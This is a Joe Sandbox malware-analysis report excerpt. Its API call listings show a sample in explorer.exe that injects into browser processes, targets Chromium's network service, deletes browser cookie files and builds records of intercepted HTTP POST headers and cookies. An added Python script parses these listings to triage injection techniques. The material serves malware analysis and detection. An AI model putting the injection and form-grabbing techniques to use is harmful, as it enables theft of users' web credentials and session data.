• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
• String ID: 0-Fw$atan$ntdll$opera_shared_counter
• API String ID: 1066286714-2890147644
• Opcode ID: acb68d32738f095d54c6768d17fac5528688d37154eeb5ff32c8313cb5c2d216
• Instruction ID: 883647b3167d6b4ad7feb258e6e16c0cb56cf0af633a0cc0d15d00ae70b360fe
• Opcode Fuzzy Hash: acb68d32738f095d54c6768d17fac5528688d37154eeb5ff32c8313cb5c2d216
• Instruction Fuzzy Hash: 8961AF31504325BFD320EF62DC88E6BBFECEB58750F044619B948D3251D775DA848B61
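The three listings above carry the evidence for the sample's browser targeting: the Toolhelp32 walk that compares each process name against firefox.exe, iexplore.exe and microsoftedgecp.exe; the StrStrIA check on the "chrome.exe|opera.exe|msedge.exe" list whose sub-call queries the process with NtQueryInformationProcess class 0x3C and looks for "NetworkService"; and the OpenProcess / ReadProcessMemory / WriteProcessMemory / CreateRemoteThread sequence guarded by the opera_shared_counter mutex. The following Python script is an added example, not code from the Joe Sandbox report or from the sample: it parses lines in the report's "APIs" format and maps ordered API subsequences to technique labels, so an analyst can triage dozens of such listings without reading each one. The sample listing is a constructed subset re-typed from the call sites above; the technique labels, and the reading of class 0x3C as ProcessCommandLineInformation (the marker "NetworkService" appears on the command line of Chromium's network-service child process), are this example's own interpretation rather than anything the report states.

```python
"""Triage a Joe Sandbox "APIs" listing for the browser-targeting and injection
chains shown in this report. Added example; not code from the report or the sample."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One listing line in the report's format, e.g.
#   • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 03223CA1
#   • Part of subcall function 03222E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 03222E92
#   • GetLastError.KERNEL32 ref: 03222166          (no argument list at all)
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"[0-9A-Fa-f]+")

# Constructed sample: call sites re-typed from the listings above, in report format.
SAMPLE_LISTING = """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03223C69
• Process32First.KERNEL32(00000000,?), ref: 03223C88
• lstrcmpiA.KERNEL32(?,firefox.exe), ref: 03223CA1
• lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 03223CB1
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03223CC1
• StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,03223CD2), ref: 03222EB4
  • Part of subcall function 03222E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 03222E52
  • Part of subcall function 03222E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 03222E92
• OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,7556E800), ref: 0322201A
• NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 032220E5
• CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0322215E
• GetLastError.KERNEL32 ref: 03222166
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 032221D8
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032221EB
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03222224
"""

BROWSERS = {"firefox.exe", "iexplore.exe", "microsoftedgecp.exe",
            "chrome.exe", "opera.exe", "msedge.exe"}
PROCESS_COMMAND_LINE_INFORMATION = 0x3C  # our reading of the class passed at 03222E52


@dataclass
class Call:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str                # call-site address from the "ref:" field
    subcall: Optional[str]  # callee address when the line is "Part of subcall function"


def parse_listing(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings, hashes and other non-call lines are skipped
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
    return calls


def _in_order(calls: List[Call], *apis: str) -> bool:
    """True when the APIs occur as an ordered subsequence of the listing."""
    pos = 0
    for c in calls:
        if pos < len(apis) and c.api == apis[pos]:
            pos += 1
    return pos == len(apis)


def _browser_args(calls: List[Call], api: str) -> List[str]:
    """Browser executable names passed as string arguments to `api` ('|' lists are split)."""
    names = set()
    for c in calls:
        if c.api == api:
            for a in c.args:
                names.update(n.lower() for n in a.split("|") if n.lower() in BROWSERS)
    return sorted(names)


def triage(calls: List[Call]) -> Dict[str, List[str]]:
    """Map technique labels to their evidence (browser names, mutex names, call-site refs)."""
    findings: Dict[str, List[str]] = {}
    if _in_order(calls, "CreateToolhelp32Snapshot", "Process32First", "lstrcmpiA"):
        if names := _browser_args(calls, "lstrcmpiA"):
            findings["browser_process_enumeration"] = names
    # A '|'-joined browser list in StrStrIA plus a command-line query for the
    # "NetworkService" marker singles out Chromium's network-service child process.
    cmdline_query = any(c.api == "NtQueryInformationProcess" and len(c.args) > 1
                        and HEX_RE.fullmatch(c.args[1])
                        and int(c.args[1], 16) == PROCESS_COMMAND_LINE_INFORMATION for c in calls)
    svc_marker = any(c.api == "StrStrIW" and "NetworkService" in c.args for c in calls)
    if cmdline_query and svc_marker and (names := _browser_args(calls, "StrStrIA")):
        findings["chromium_network_service_targeting"] = names
    if _in_order(calls, "OpenProcess", "WriteProcessMemory", "CreateRemoteThread"):
        findings["remote_thread_injection"] = [c.ref for c in calls if c.api == "CreateRemoteThread"]
    unmaps = [c.ref for c in calls if c.api == "NtUnmapViewOfSection"]
    if unmaps:
        findings["section_unmapping"] = unmaps
    for prev, nxt in zip(calls, calls[1:]):
        # A named mutex checked straight away with GetLastError is a single-instance
        # guard; the mutex name is a host-side indicator worth recording.
        if prev.api == "CreateMutexA" and nxt.api == "GetLastError":
            findings.setdefault("named_mutex", []).append(prev.args[-1])
    return findings
```

Run `triage(parse_listing(text))` over the text of any "APIs" block copied from a report; the call-site refs in the result point back to the addresses in the listing, so each label can be verified in the dump. Subsequence matching rather than exact adjacency is deliberate: the listings interleave CloseHandle, Sleep and subcall lines between the calls that matter.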

Control-flow Graph

APIs
  • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
  • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
• PathCombineW.SHLWAPI(00000000,00000000,*.*,755AF770,00000000,76EEB2E0,774783D0), ref: 032215EB
• FindFirstFileW.KERNEL32(00000000,?), ref: 032215F7
• lstrcmpiW.KERNEL32(?,032241C8), ref: 03221623
• lstrcmpiW.KERNEL32(?,032241CC), ref: 03221633
• PathCombineW.SHLWAPI(00000000,?,?), ref: 0322164C
• PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 03221661
• PathCombineW.SHLWAPI(00000000,?,?), ref: 0322167E
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0322169C
• FindClose.KERNEL32(00000000), ref: 032216AB
Strings
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
• String ID: *.*$Cookies*
• API String ID: 4256701249-3228320225
APIs
  • Part of subcall function 032213FE: wsprintfW.USER32 ref: 0322142A
  • Part of subcall function 032213FE: FindFirstFileW.KERNEL32(00000000,?), ref: 03221439
  • Part of subcall function 032213FE: wsprintfW.USER32 ref: 03221476
  • Part of subcall function 032213FE: RemoveDirectoryW.KERNEL32(00000000), ref: 0322149C
  • Part of subcall function 032213FE: FindNextFileW.KERNEL32(00000000,00000010), ref: 032214AF
  • Part of subcall function 032213FE: FindClose.KERNEL32(00000000), ref: 032214BA
  • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
  • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
• wsprintfW.USER32 ref: 0322150D
• FindFirstFileW.KERNEL32(00000000,?), ref: 0322151C
• wsprintfW.USER32 ref: 03221557
• SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0322156A
• DeleteFileW.KERNEL32(00000000), ref: 03221571
• FindNextFileW.KERNEL32(00000000,00000010), ref: 03221584
• FindClose.KERNEL32(00000000), ref: 0322158F
Strings
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
• String ID: %s%s$*.*
• API String ID: 2055899612-705776850
APIs
  • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
  • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
• wsprintfW.USER32 ref: 0322142A
• FindFirstFileW.KERNEL32(00000000,?), ref: 03221439
• wsprintfW.USER32 ref: 03221476
  • Part of subcall function 032214D8: wsprintfW.USER32 ref: 0322150D
  • Part of subcall function 032214D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0322151C
  • Part of subcall function 032214D8: wsprintfW.USER32 ref: 03221557
  • Part of subcall function 032214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0322156A
  • Part of subcall function 032214D8: DeleteFileW.KERNEL32(00000000), ref: 03221571
  • Part of subcall function 032214D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 03221584
  • Part of subcall function 032214D8: FindClose.KERNEL32(00000000), ref: 0322158F
• RemoveDirectoryW.KERNEL32(00000000), ref: 0322149C
• FindNextFileW.KERNEL32(00000000,00000010), ref: 032214AF
• FindClose.KERNEL32(00000000), ref: 032214BA
Strings
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
• String ID: %s%s$%s%s\$*.*
• API String ID: 2055899612-4093207852
APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 032211A9
• CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 032211C1
• lstrlen.KERNEL32(?,00000000), ref: 032211C9
• CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 032211D4
• CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 032211EE
• wsprintfA.USER32 ref: 03221205
• CryptDestroyHash.ADVAPI32(?), ref: 0322121E
• CryptReleaseContext.ADVAPI32(?,00000000), ref: 03221228
Strings
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
• String ID: %02X
• API String ID: 3341110664-436463671
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,03222EC5), ref: 03222E27
  • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
  • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
• NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 03222E52
• NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 03222E7F
• StrStrIW.SHLWAPI(?,NetworkService), ref: 03222E92
  • Part of subcall function 03221011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,032214CB), ref: 03221020
  • Part of subcall function 03221011: HeapFree.KERNEL32(00000000), ref: 03221027
Strings
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: Process$Heap$InformationQuery$AllocateFreeOpen
• String ID: NetworkService
• API String ID: 1656241333-2019834739
APIs
• RtlMoveMemory.NTDLL(?,?,?), ref: 03221E83
• LoadLibraryA.KERNEL32(?,03226058,00000000,00000000,75572EE0,00000000,032220DC,?), ref: 03221EAB
• GetProcAddress.KERNEL32(00000000,-00000002), ref: 03221ED8
• LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03221F29
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
• String ID:
• API String ID: 3827878703-0
APIs
  • Part of subcall function 03221141: lstrlen.KERNEL32(?,?,?,00000000,?,032229DD,00000001), ref: 03221150
  • Part of subcall function 03221141: lstrlen.KERNEL32(:method POST,?,00000000,?,032229DD,00000001), ref: 03221155
  • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
  • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
  • Part of subcall function 0322104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,03222A16,?,00000001), ref: 03221056
  • Part of subcall function 0322285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 032228A2
• lstrcat.KERNEL32(00000000,dyn_header_host), ref: 03222A4A
• lstrcat.KERNEL32(00000001,dyn_header_path), ref: 03222A6C
• lstrcat.KERNEL32(?,dyn_header_ua), ref: 03222A8D
• RtlZeroMemory.NTDLL(?,0000000A), ref: 03222A96
• StrToIntA.SHLWAPI(00000000), ref: 03222AB9
• wnsprintfA.SHLWAPI ref: 03222B0D
• lstrcat.KERNEL32(00000000,?), ref: 03222B2D
• lstrcat.KERNEL32(00000000,{:!:}), ref: 03222B35
• lstrcat.KERNEL32(00000000,?), ref: 03222B3C
Strings
Memory Dump Source
• Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
Similarity
• API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
• String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
• API String ID: 2605944266-950501416
                                                                                                                                      • Opcode ID: a40f93ba0e5149ed0f2d6b8d2b7e407119a87e779b79eed0295175edec4c5eab
                                                                                                                                      • Instruction ID: ed314800bde859b7bdae49fcedaa9159929c46fdfa4c90a78d0044db88526b93
                                                                                                                                      • Opcode Fuzzy Hash: a40f93ba0e5149ed0f2d6b8d2b7e407119a87e779b79eed0295175edec4c5eab
                                                                                                                                      • Instruction Fuzzy Hash: 0951C134614361BFC715FF268C84F2EBEDAAF88204F04085CF8455B241CBB5ED858762

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(?,?,?,00000000,?,032229DD,00000001), ref: 03221150
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(:method POST,?,00000000,?,032229DD,00000001), ref: 03221155
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000000A), ref: 03222FFA
                                                                                                                                      • StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,03223347), ref: 03223024
                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03223347), ref: 03223052
                                                                                                                                      • wsprintfA.USER32 ref: 032230B9
                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 032230E5
                                                                                                                                      • lstrcat.KERNEL32(?,{:!:}), ref: 032230F8
                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,03226038), ref: 03223109
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000), ref: 03223112
                                                                                                                                        • Part of subcall function 03221011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,032214CB), ref: 03221020
                                                                                                                                        • Part of subcall function 03221011: HeapFree.KERNEL32(00000000), ref: 03221027
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                                                                                                                      • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                                                                                                      • API String ID: 2886538537-1627781280
                                                                                                                                      • Opcode ID: a5e5aa8df1be211eb6dbf9d666455775430f2f19c1f4b379641f423979c43963
                                                                                                                                      • Instruction ID: fc31cb63d258a50d87ab9a5d1bb8a386565afa26bed69a525f4cb9cd14db00c3
                                                                                                                                      • Opcode Fuzzy Hash: a5e5aa8df1be211eb6dbf9d666455775430f2f19c1f4b379641f423979c43963
                                                                                                                                      • Instruction Fuzzy Hash: FD3116353203657BD714FA229C55F6F3E99DBD0B40F00842CF8028F285DAB9E9858BA1

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03221374
                                                                                                                                        • Part of subcall function 03221363: Process32First.KERNEL32(00000000,?), ref: 03221393
                                                                                                                                        • Part of subcall function 03221363: CloseHandle.KERNEL32(00000000), ref: 032213CB
                                                                                                                                        • Part of subcall function 03221363: lstrcmpiA.KERNEL32(?), ref: 032213A3
                                                                                                                                        • Part of subcall function 03221363: Process32Next.KERNEL32(00000000,00000128), ref: 032213C0
                                                                                                                                      • Sleep.KERNEL32(000003E8,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 03223731
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 03223752
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 03223764
                                                                                                                                        • Part of subcall function 032215BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,755AF770,00000000,76EEB2E0,774783D0), ref: 032215EB
                                                                                                                                        • Part of subcall function 032215BE: FindFirstFileW.KERNEL32(00000000,?), ref: 032215F7
                                                                                                                                        • Part of subcall function 032215BE: lstrcmpiW.KERNEL32(?,032241C8), ref: 03221623
                                                                                                                                        • Part of subcall function 032215BE: lstrcmpiW.KERNEL32(?,032241CC), ref: 03221633
                                                                                                                                        • Part of subcall function 032215BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0322164C
                                                                                                                                        • Part of subcall function 032215BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 0322169C
                                                                                                                                        • Part of subcall function 032215BE: FindClose.KERNEL32(00000000), ref: 032216AB
                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0322377A
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 03223783
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 0322378F
                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 032237A3
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 032237AC
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 032237B8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                                                                                                      • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                                                                                                      • API String ID: 909495591-1175993956
                                                                                                                                      • Opcode ID: ec8c9c0d8d1a206c011f8c3204177114d92cabb7d7c615f1febe570ea94e51f4
                                                                                                                                      • Instruction ID: e5c3217217f9b1df2baa4213cc0b7c4cffc79ded29bcefaced4f4b048e0134f1
                                                                                                                                      • Opcode Fuzzy Hash: ec8c9c0d8d1a206c011f8c3204177114d92cabb7d7c615f1febe570ea94e51f4
                                                                                                                                      • Instruction Fuzzy Hash: DE113E243A177836E434F6232C82F7FAC4ACFA1A81F110004F6066EAC4CED4AAC105AE

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03221374
                                                                                                                                        • Part of subcall function 03221363: Process32First.KERNEL32(00000000,?), ref: 03221393
                                                                                                                                        • Part of subcall function 03221363: CloseHandle.KERNEL32(00000000), ref: 032213CB
                                                                                                                                        • Part of subcall function 03221363: lstrcmpiA.KERNEL32(?), ref: 032213A3
                                                                                                                                        • Part of subcall function 03221363: Process32Next.KERNEL32(00000000,00000128), ref: 032213C0
                                                                                                                                      • Sleep.KERNEL32(000003E8,?,00000000,?,0322382F,?,03223C53,00000001), ref: 032235FA
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,0322382F,?,03223C53,00000001), ref: 03223613
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,0322382F,?,03223C53,00000001), ref: 03223623
                                                                                                                                      • wsprintfW.USER32 ref: 03223644
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 0322150D
                                                                                                                                        • Part of subcall function 032214D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0322151C
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 03221557
                                                                                                                                        • Part of subcall function 032214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0322156A
                                                                                                                                        • Part of subcall function 032214D8: DeleteFileW.KERNEL32(00000000), ref: 03221571
                                                                                                                                        • Part of subcall function 032214D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 03221584
                                                                                                                                        • Part of subcall function 032214D8: FindClose.KERNEL32(00000000), ref: 0322158F
                                                                                                                                        • Part of subcall function 03221011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,032214CB), ref: 03221020
                                                                                                                                        • Part of subcall function 03221011: HeapFree.KERNEL32(00000000), ref: 03221027
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,0322382F,?,03223C53,00000001), ref: 03223672
                                                                                                                                      • lstrcatW.KERNEL32(00000000,03224614,?,00000000,?,0322382F,?,03223C53,00000001), ref: 03223682
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                                                                                                      • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                                                                                                      • API String ID: 2436889709-3669280581
                                                                                                                                      • Opcode ID: 7c38492aed142707d7b5b6de689553ff60555c24d497951bd7777a4dcf176165
                                                                                                                                      • Instruction ID: da77a28de15ad1e39bff4ef76d4ac30d5a53d4a1d732c294130b06e9dc4587d7
                                                                                                                                      • Opcode Fuzzy Hash: 7c38492aed142707d7b5b6de689553ff60555c24d497951bd7777a4dcf176165
                                                                                                                                      • Instruction Fuzzy Hash: 7D1170343703613BE624B7676C99F3E2D5ADBE6F41F450018FA06AA2C4CED819D08279

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0322322D
                                                                                                                                      • wsprintfA.USER32 ref: 0322329E
                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 032232AF
                                                                                                                                      • lstrcat.KERNEL32(00000000,{:!:}), ref: 032232BE
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 032232C1
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 032232D2
                                                                                                                                        • Part of subcall function 03221011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,032214CB), ref: 03221020
                                                                                                                                        • Part of subcall function 03221011: HeapFree.KERNEL32(00000000), ref: 03221027
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                                                                                                      • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                                                                                                      • API String ID: 3430864794-1604029033
                                                                                                                                      • Opcode ID: 48e3c9db3f76ff5854a7315b56ad48ffe4a8549ee4a62f583aee0a03fbeaf6d5
                                                                                                                                      • Instruction ID: dd4133500aa42c584bed1fe6f98198a614fab987f1f1ee012134b866ad4ab28b
                                                                                                                                      • Opcode Fuzzy Hash: 48e3c9db3f76ff5854a7315b56ad48ffe4a8549ee4a62f583aee0a03fbeaf6d5
                                                                                                                                      • Instruction Fuzzy Hash: 86418F75104355BFD320EF10DC48E6BBBECFB94345F044A2EF94296241DBB5AA48CBA2

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • RtlEnterCriticalSection.NTDLL(03226038), ref: 03223455
                                                                                                                                      • lstrcat.KERNEL32 ref: 032234AB
                                                                                                                                        • Part of subcall function 03222FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 03222FFA
                                                                                                                                        • Part of subcall function 03222FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,03223347), ref: 03223024
                                                                                                                                        • Part of subcall function 03222FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03223347), ref: 03223052
                                                                                                                                        • Part of subcall function 03222FAA: wsprintfA.USER32 ref: 032230B9
                                                                                                                                        • Part of subcall function 03222FAA: lstrcat.KERNEL32(00000000,00000000), ref: 032230E5
                                                                                                                                        • Part of subcall function 03222F1F: CreateThread.KERNEL32(00000000,00000000,03222ED2,?,00000000,00000000), ref: 03222F2F
                                                                                                                                        • Part of subcall function 03222F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 03222F36
                                                                                                                                        • Part of subcall function 0322105D: VirtualFree.KERNEL32(?,00000000,00008000,03222B4B), ref: 03221065
                                                                                                                                      • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 03223504
                                                                                                                                      • StrToIntA.SHLWAPI(?,00000000,?), ref: 0322352B
